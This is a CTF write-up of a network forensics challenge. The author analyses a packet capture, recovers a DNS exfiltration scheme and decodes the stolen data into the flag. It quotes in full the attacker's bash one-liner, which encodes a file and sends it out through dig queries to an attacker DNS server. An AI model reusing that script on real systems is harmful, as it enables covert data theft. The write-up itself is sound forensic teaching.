ICMTC CTF Qualifications (Digital Forensics)

First Blood

In this post, I’ll be describing how I solved Exfiltrated Digital Forensics Challenge

Challenge Name: Exfiltrated

Description : Can you extract the exfiltrated data and get the flag ?

Difficulty : Hard

we have network traffic capture

from description and type of file we know it data exfiltration

Data Exfiltration is the theft or unauthorized transfer of data from a device or network and send it to server for attacker, to more information

network traffic

after analysis the file i found dns requests and http traffic

lets check dns requests

i see requests from ip : 172.168.40.2 to 192.168.1.130

Victime ip : 172.168.40.2

Malicious dns server ip : 192.168.1.130

but the data not base encode or hex we need to more analysis :)

Now i will try to analysis the http requests

after i saved http data i see something weird

f=file.txt; s=2;b=5;c=0; for r in $(for i in $(gzip -c $f| xxd -p | base32 -w0 | base64 -w0 |sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s"  ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @192.168.1.130 `echo -ne $r|tr "+" "*"|tr "Q" "$"` +short; sleep 1s; done

that is weird its must css file not bash script

that mean the attacker used this script to exfiltration data

user-agent : Wget

that mean the attacker download the script in server using wget command

now time to understand code

in first i tested file in my network to show the traffic

now we need to get dns requests

tshark -r ctf.pcap.pcapng -e “dns.qry.name” -Tfields -Y “ip.dst==192.168.1.130”

i used tsark to get it

-r set the filename to read from

-e to select to filter data we need get

-Y filter, i use it to select only ip address

now after save data we need reverse the code to get the flag

from end to up

replace $ to be Q

remove . and -

and decode it as base64

and decode it as base32

and decode it as hex

now i will extract it

flag: EGCERT{##############It5_Be3n_a_ro5gh_Cha1lEnge##################}